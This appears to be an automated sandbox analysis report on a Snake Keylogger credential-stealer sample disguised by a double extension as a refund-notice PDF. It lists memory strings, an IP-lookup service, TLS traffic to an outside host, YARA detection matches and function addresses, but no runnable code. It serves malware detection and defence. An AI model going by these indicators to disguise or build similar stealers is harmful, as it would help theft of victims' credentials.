                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: SOFcFE.exe, 00000014.00000002.3763196888.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: SOFcFE.exe, 00000014.00000002.3763196888.0000000002E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: SOFcFE.exe, 00000014.00000002.3763196888.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49747 version: TLS 1.2

                System Summary

                barindex
                Source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000014.00000002.3760059045.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: initial sampleStatic PE information: Filename: GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_010AD5DC1_2_010AD5DC
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CCD2FB1_2_09CCD2FB
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CC9A581_2_09CC9A58
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CC7A001_2_09CC7A00
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CC71901_2_09CC7190
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CC90A81_2_09CC90A8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CC02681_2_09CC0268
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CC02781_2_09CC0278
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CC75C81_2_09CC75C8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CC44E01_2_09CC44E0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CC07C01_2_09CC07C0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CC07AF1_2_09CC07AF
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_09CC66491_2_09CC6649
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116711814_2_01167118
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116C14814_2_0116C148
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116A08814_2_0116A088
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116536214_2_01165362
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116D27814_2_0116D278
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116C46814_2_0116C468
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116C73814_2_0116C738
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116E98814_2_0116E988
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_011669B014_2_011669B0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116CA0814_2_0116CA08
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116CCD814_2_0116CCD8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116CFAA14_2_0116CFAA
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116E97A14_2_0116E97A
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_0116F96114_2_0116F961
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_011629E014_2_011629E0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_01163E0914_2_01163E09
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A8FB014_2_058A8FB0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AEE7014_2_058AEE70
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A81D014_2_058A81D0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A7B7814_2_058A7B78
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A15E814_2_058A15E8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A15F814_2_058A15F8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AA52814_2_058AA528
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AA53814_2_058AA538
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A0D3914_2_058A0D39
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A0D4814_2_058A0D48
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AE54014_2_058AE540
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AE55014_2_058AE550
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AC55014_2_058AC550
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AC56014_2_058AC560
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A648814_2_058A6488
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A048914_2_058A0489
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A049814_2_058A0498
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AFC2014_2_058AFC20
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058ADC2114_2_058ADC21
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058ABC3314_2_058ABC33
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058ADC3014_2_058ADC30
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058ABC4014_2_058ABC40
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A345014_2_058A3450
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A346014_2_058A3460
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A647814_2_058A6478
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AD78F14_2_058AD78F
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A578014_2_058A5780
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AF78014_2_058AF780
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AF79014_2_058AF790
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AD7A014_2_058AD7A0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AB7A014_2_058AB7A0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A8FA114_2_058A8FA1
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AB7B014_2_058AB7B0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A2FF914_2_058A2FF9
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A771014_2_058A7710
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A772014_2_058A7720
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A274914_2_058A2749
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A275814_2_058A2758
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A577014_2_058A5770
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058ACE8014_2_058ACE80
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A1E9814_2_058A1E98
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A1EA814_2_058A1EA8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A4EC014_2_058A4EC0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A4ED014_2_058A4ED0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A461014_2_058A4610
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A462014_2_058A4620
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AEE5F14_2_058AEE5F
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058ACE6F14_2_058ACE6F
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A6E7214_2_058A6E72
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A6E7014_2_058A6E70
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A119014_2_058A1190
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A11A014_2_058A11A0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AE9D014_2_058AE9D0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AE9E014_2_058AE9E0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AC9E014_2_058AC9E0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AC9F014_2_058AC9F0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AE0AF14_2_058AE0AF
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A38B814_2_058A38B8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AC0BF14_2_058AC0BF
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AE0C014_2_058AE0C0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AC0D014_2_058AC0D0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A08E014_2_058A08E0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A08F014_2_058A08F0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A300814_2_058A3008
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A000614_2_058A0006
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A300714_2_058A3007
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A602214_2_058A6022
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A603014_2_058A6030
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A004014_2_058A0040
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A2BA014_2_058A2BA0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A2BB014_2_058A2BB0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A5BD814_2_058A5BD8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AB30F14_2_058AB30F
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A230014_2_058A2300
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AF30014_2_058AF300
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A531A14_2_058A531A
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AD31014_2_058AD310
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A532814_2_058A5328
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AB32014_2_058AB320
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A7B6914_2_058A7B69
